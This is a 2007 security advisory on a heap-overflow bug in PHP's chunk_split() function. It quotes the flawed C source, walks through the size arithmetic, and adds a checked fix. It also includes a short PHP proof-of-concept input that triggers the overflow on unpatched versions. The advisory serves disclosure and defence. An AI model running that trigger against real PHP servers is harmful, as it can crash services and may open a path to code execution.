Sunday, June 03, 2007

[UNIX] PHP chunk_split() Integer Overflow

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - - - - - - - -

PHP chunk_split() Integer Overflow
------------------------------------------------------------------------


SUMMARY

PHP is "a widely-used general-purpose scripting language that is
especially suited for Web development". In the chunk_split() implementation
the parameters chunks, srclen and chunklen are used in a memory allocation
statement without any range check. A possible integer overflow in that size
computation can result in the allocation of a buffer that is too small,
which leads to a heap overflow. This crashes the PHP process and may allow
execution of arbitrary code.

DETAILS

Vulnerable Systems:
* PHP versions prior to 5.2.3

Immune Systems:
* PHP version 5.2.3 and newer

In line 1963 the chunk_split function tries to allocate the right amount
of memory for the result of the function. If the values chunks and endlen
are both bigger than 65534, the product (chunks + 1) * endlen overflows the
int arithmetic, the wrong (too small) size is allocated, and the copy loop
that follows writes past the end of the buffer, which results in a heap
overflow.

ext/standard/string.c:
1953 static char *php_chunk_split(char *src, int srclen, char *end, int endlen, int chunklen, int *destlen)
1954 {
1955     char *dest;
1956     char *p, *q;
1957     int chunks; /* complete chunks! */
1958     int restlen;
1959
1960     chunks = srclen / chunklen;
1961     restlen = srclen - chunks * chunklen; /* srclen % chunklen */
1962
1963     dest = safe_emalloc((srclen + (chunks + 1) * endlen + 1), sizeof(char), 0);
1964
1965     for (p = src, q = dest; p < (src + srclen - chunklen + 1); ) {
1966         memcpy(q, p, chunklen);
1967         q += chunklen;
1968         memcpy(q, end, endlen);
1969         q += endlen;
1970         p += chunklen;
1971     }

Proof of concept:
<?
$a=str_repeat("A", 65535);
$b=1;
$c=str_repeat("A", 65535);
chunk_split($a,$b,$c);
?>
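The arithmetic behind line 1963 and the proof-of-concept values above, as an added C example (it is not code from the advisory or from PHP): it reproduces the wrapped size for srclen=65535, chunklen=1, endlen=65535, counts how many bytes the copy loop at lines 1965-1971 would then write, and contrasts both with an overflow-checked size calculation that rejects such input. The function names are my own, and the checked variant illustrates the defensive pattern generically; it is not the PHP 5.2.3 patch.

```c
#include <limits.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Size computed by the vulnerable line 1963, reproduced in 32-bit modular
 * arithmetic. The original uses signed int, where overflow is undefined
 * behaviour; on two's-complement builds it wraps exactly like this uint32_t. */
uint32_t vulnerable_dest_size(uint32_t srclen, uint32_t chunklen, uint32_t endlen)
{
    uint32_t chunks = srclen / chunklen;          /* complete chunks */
    return srclen + (chunks + 1u) * endlen + 1u;  /* wraps silently */
}

/* Bytes the copy loop (lines 1965-1971) writes into dest for the same
 * inputs, summed in 64 bits so the total itself cannot wrap. The restlen
 * handling after line 1971 is not shown on the page and is not counted.
 * "p + chunklen <= srclen" is the loop condition "p < src + srclen - chunklen + 1"
 * rewritten without pointer underflow. */
uint64_t loop_bytes_written(uint32_t srclen, uint32_t chunklen, uint32_t endlen)
{
    uint64_t written = 0;
    for (uint64_t p = 0; p + chunklen <= srclen; p += chunklen)
        written += (uint64_t)chunklen + endlen;   /* one chunk plus one end marker */
    return written;
}

/* Overflow-checked replacement for the size computation (hypothetical,
 * defensive illustration). Returns false, and allocates nothing, when the
 * inputs are out of range or the result would not fit in an int. */
bool checked_dest_size(uint32_t srclen, uint32_t chunklen, uint32_t endlen, size_t *out)
{
    if (chunklen == 0)
        return false;                             /* division by zero */
    if (srclen > (uint32_t)INT_MAX || endlen > (uint32_t)INT_MAX)
        return false;                             /* PHP passes ints; keep products < 2^62 */
    uint64_t chunks = srclen / chunklen;
    uint64_t total  = (uint64_t)srclen + (chunks + 1) * (uint64_t)endlen + 1;
    if (total > (uint64_t)INT_MAX)
        return false;                             /* would overflow the int size */
    *out = (size_t)total;
    return true;
}

int main(void)
{
    size_t n = 0;
    /* Values from the advisory's proof of concept. */
    printf("line 1963 allocates %u bytes, loop writes %llu bytes\n",
           vulnerable_dest_size(65535, 1, 65535),
           (unsigned long long)loop_bytes_written(65535, 1, 65535));
    printf("checked size: %s\n",
           checked_dest_size(65535, 1, 65535, &n) ? "accepted" : "rejected");
    return 0;
}
```

Compiled with `cc -std=c99`, the program reports that the wrapped size is exactly 0 bytes (65535 + 65536 * 65535 + 1 equals 2^32) while the loop would write 4,294,901,760 bytes, and that the checked computation rejects the input instead of allocating.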

Vendor status:
Vendor notified: 2007-05-29
Vendor response: 2007-05-29
Patch available: 2007-06-01
Coordinated disclosure: 2007-06-01


ADDITIONAL INFORMATION

The information has been provided by Gerhard Wagner <research@sec-consult.com>.
The original article can be found at:
http://www.sec-consult.com/fileadmin/Advisories/20070601-php_chunk_split.txt
